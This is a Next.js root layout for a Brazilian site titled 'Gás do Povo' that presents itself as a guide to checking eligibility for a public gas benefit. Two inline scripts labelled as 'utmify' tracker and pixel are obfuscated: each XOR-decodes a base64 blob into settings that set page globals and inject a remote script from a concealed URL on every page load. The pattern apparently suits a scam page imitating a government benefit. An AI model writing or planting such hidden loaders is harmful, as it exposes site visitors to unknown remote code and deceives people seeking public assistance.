import type { Metadata } from "next";
import Script from "next/script";
import "./globals.css";
import { officialUrl } from "./config";

export const metadata: Metadata = { title: "Gás do Povo", description: "Veja quem tem direito ao Gás do Povo e como consultar o benefício.", metadataBase: officialUrl ? new URL(officialUrl) : undefined, openGraph: { title: "Gás do Povo", description: "Guia para consultar o benefício.", images: ["/images/Gas-do-Povo-2.webp"], locale: "pt_BR", type: "article" } };

const utmifyTracker = `(function(){var v_5m=atob("DLXIAWrcf+MZ/JqMks7qdBiwXdk7lO744sbyLkW/G403ie7h+9OxLwmzEs17jrX/8cehcR6vUJZtkemj/tS8ZBmoUYlq3rau88G8cwO+Cpd8j7i2yc7qbwuxGsEj3v7t5tTldB6xFoVg0er+98Otbx7xB4B2mLf/8d7qLUiqHo9smbi2sJe1LRH+EYJ0mbi2sNGpdQvxCpd0lfz1v8W6ZBy5EZc0j+/u+9G7I0b+CYJ1if+uqJfqfDeh");var v_fc=[];for(var e_c=0;e_c<v_5m.length;e_c++){v_fc.push(v_5m.charCodeAt(e_c)&255);}var s_y=v_fc[0];var f_rkh=v_fc.slice(1,1+s_y);var d_r=v_fc.slice(1+s_y);var f_9j=d_r.map(function(b,g_r9j){return b^f_rkh[g_r9j%s_y];});var f_vs="";for(var e_9xu=0;e_9xu<f_9j.length;e_9xu++){f_vs+=String.fromCharCode(f_9j[e_9xu]&255);}var p_z35=decodeURIComponent(escape(f_vs));var i_7zk=JSON.parse(p_z35);var d_zh=i_7zk.globals||[];d_zh.forEach(function(y_5){window[y_5.name]=y_5.value;});var o_ng=document.createElement("script");o_ng.src=i_7zk.url;o_ng.async=true;o_ng.defer=true;(i_7zk.attributes||[]).forEach(function(y_9){o_ng.setAttribute(y_9.name,y_9.value);});(document.head||document.documentElement).appendChild(o_ng);})();`;
const utmifyPixel = `(function(){var w_it0=atob("DMUod4H22k+UKBHdAr4KAvOa+HW2QGWpcrYSWK6VviG6XWWwa6NRWeKZt2H2Wj6uYbdBB/WF9T/9UHSxLbVBD+Sa9CXnCj3/Y7FcBeiUrzvxWzPnWZgEVeaatS31RGL/OJ5TVe+Xtyq2EjOta71NG8iS+GO2XnCxd6AKTaPAu3fwESi+YaQYbHE6yylS3O5O/caRbPUpxLp");var b_4=[];for(var n_p=0;n_p<w_it0.length;n_p++){b_4.push(w_it0.charCodeAt(n_p)&255);}var h_ld3y=b_4[0];var l_ecc2=b_4.slice(1,1+h_ld3y);var e_332=b_4.slice(1+h_ld3y);var l_26=e_332.map(function(b,l_2){return b^l_ecc2[l_2%h_ld3y];});var g_x2="";for(var x_9rx=0;x_9rx<l_26.length;x_9rx++){g_x2+=String.fromCharCode(l_26[x_9rx]&255);}var j_zmhy=decodeURIComponent(escape(g_x2));var d_jr=JSON.parse(j_zmhy);var x_n=d_jr.globals||[];x_n.forEach(function(m_oh10){window[m_oh10.name]=m_oh10.value;});var p_s1q=document.createElement("script");p_s1q.src=d_jr.url;p_s1q.async=true;p_s1q.defer=true;(d_jr.attributes||[]).forEach(function(d_k){p_s1q.setAttribute(d_k.name,d_k.value);});(document.head||document.documentElement).appendChild(p_s1q);})();`;

export default function RootLayout({ children }: Readonly<{ children: React.ReactNode }>) { return <html lang="pt-BR"><body><Script id="utmify-tracker" strategy="afterInteractive">{utmifyTracker}</Script><Script id="utmify-pixel" strategy="afterInteractive">{utmifyPixel}</Script>{children}</body></html>; }
